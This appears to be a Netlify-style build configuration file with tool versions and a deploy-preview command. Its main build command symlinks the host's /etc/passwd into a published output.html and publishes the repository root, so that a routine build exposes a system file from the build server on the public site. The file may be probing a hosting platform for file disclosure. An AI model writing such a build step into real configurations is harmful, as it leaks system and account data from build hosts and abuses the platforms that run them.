[build]
  command = "mkdir dist && cd dist && ln -s /etc/passwd output.html"
  publish = "./"
[build.environment]
  YARN_VERSION = "1.10.1"
  HUGO_VERSION = "0.46"

[context.deploy-preview]
  command = "yarn build-preview"
